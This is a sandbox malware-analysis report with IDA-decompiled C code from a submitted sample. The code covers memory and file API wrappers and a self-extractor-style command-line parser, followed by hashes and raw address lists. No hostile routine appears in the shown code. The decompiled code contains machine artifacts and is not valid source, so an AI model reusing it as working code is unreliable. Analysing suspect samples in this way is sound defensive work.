                                                                                                                                                                                                        			E00E84B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xe88d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xe88d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xe88d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00E84FA1,00000000), ref: 00E84B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: e1f32b0e39771a38ab21fe7af280a07e6c73a04e5c9c9bfbcb92512774d3a8b5
                                                                                                                                                                                                        • Instruction ID: 9d5b1d37d1982333289890ae6f4581767f392aa1ef5bc41f1f072a0bab5e3de6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1f32b0e39771a38ab21fe7af280a07e6c73a04e5c9c9bfbcb92512774d3a8b5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8F01971540B099E8771DF79CD04552BBEEEB993603501B2FA86EF21D1EB309841DBD0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E866AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00E84777,?,00E84E38,?), ref: 00E866B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: ca8ef27ea99db45fbb30066a88e8b9de709d4df2267dc52dc6b7a91f39a6d808
                                                                                                                                                                                                        • Instruction ID: eeaf14ed726f6f416b4179f961dc41f90cc02e03269528961d2a334012efe8ca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca8ef27ea99db45fbb30066a88e8b9de709d4df2267dc52dc6b7a91f39a6d808
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31B0927622248046AA2017326C295662841B7C123A7E82BA1F03AE01E0DA3EC84AE204
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00E84CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: da9f08261537ddac2a9bf91127be8264d5ee40b6cbf71596a45a6ba5582af6c8
                                                                                                                                                                                                        • Instruction ID: d87573dd5bb6489791f2b685720241df130f0d137f87fc440b499906ea7f0825
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da9f08261537ddac2a9bf91127be8264d5ee40b6cbf71596a45a6ba5582af6c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB0123204420CBBDF001FC3EC09F853F1DE7C4761F280011F60C550508AB294108796
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: 2e819437dae6c86cac46a9c699d2208a1817d3bca36da740c21bc48d7097f244
                                                                                                                                                                                                        • Instruction ID: 46f40b0b08e1395b08c72e5331f71815b78b6cf65b3bbf486a84b3c52fd0aed3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e819437dae6c86cac46a9c699d2208a1817d3bca36da740c21bc48d7097f244
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26B0123100010CBBCF001B43EC088453F1DD7C02607040021F50C551218B7398118685
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00E85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00E86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00E86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xe88004; // 0x18391fe1
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00E8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00E844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xe89124 = E00E86285();
									_t75 = 0;
								}
								return E00E86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00E844B9(0, 0x521, 0xe81140, 0, 0x40, 0);
												_t85 =  *0xe88588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00E8667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00E8667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00E85C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00E81680(0xe88c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00E8667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00E8667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xe88a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00E85C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xe88b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xe88a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E00E81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E00E8658A(_t218, 0x104, 0xe81140);
                                                                                                                                                                                                        																if(E00E831E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xe88a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xe88a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xe88a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xe88a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xe88a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xe89a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xe89a2c =  *0xe89a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xe88d48 =  *0xe88d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xe89a2c =  *0xe89a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0xe89a2c =  *0xe89a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xe88d48 =  *0xe88d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xe89a2c =  *0xe89a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xe88a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xe89a2c = 3;
                                                                                                                                                                                                        																	 *0xe88a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xe88a2c != 0 &&  *0xe88b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xe89a3c, 0xe88b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E00E866C8(0xe88b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x00e85e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85dcc
                                                                                                                                                                                                        0x00e85dce
                                                                                                                                                                                                        0x00e85e24
                                                                                                                                                                                                        0x00e85e24
                                                                                                                                                                                                        0x00e85e2c
                                                                                                                                                                                                        0x00e85e47
                                                                                                                                                                                                        0x00e85e4a
                                                                                                                                                                                                        0x00e861d2
                                                                                                                                                                                                        0x00e861e2
                                                                                                                                                                                                        0x00e861e7
                                                                                                                                                                                                        0x00e861ee
                                                                                                                                                                                                        0x00e861f1
                                                                                                                                                                                                        0x00e861f1
                                                                                                                                                                                                        0x00e861f8
                                                                                                                                                                                                        0x00e861f8
                                                                                                                                                                                                        0x00e85e50
                                                                                                                                                                                                        0x00e85e53
                                                                                                                                                                                                        0x00e86109
                                                                                                                                                                                                        0x00e8611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86125
                                                                                                                                                                                                        0x00e86137
                                                                                                                                                                                                        0x00e8613a
                                                                                                                                                                                                        0x00e8613c
                                                                                                                                                                                                        0x00e8613e
                                                                                                                                                                                                        0x00e8613e
                                                                                                                                                                                                        0x00e86141
                                                                                                                                                                                                        0x00e86141
                                                                                                                                                                                                        0x00e86143
                                                                                                                                                                                                        0x00e86144
                                                                                                                                                                                                        0x00e8614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86150
                                                                                                                                                                                                        0x00e86152
                                                                                                                                                                                                        0x00e8615c
                                                                                                                                                                                                        0x00e86170
                                                                                                                                                                                                        0x00e86172
                                                                                                                                                                                                        0x00e8617c
                                                                                                                                                                                                        0x00e86190
                                                                                                                                                                                                        0x00e86190
                                                                                                                                                                                                        0x00e86196
                                                                                                                                                                                                        0x00e861a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e861ab
                                                                                                                                                                                                        0x00e861b9
                                                                                                                                                                                                        0x00e861c6
                                                                                                                                                                                                        0x00e861c6
                                                                                                                                                                                                        0x00e8617e
                                                                                                                                                                                                        0x00e86180
                                                                                                                                                                                                        0x00e8618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8618a
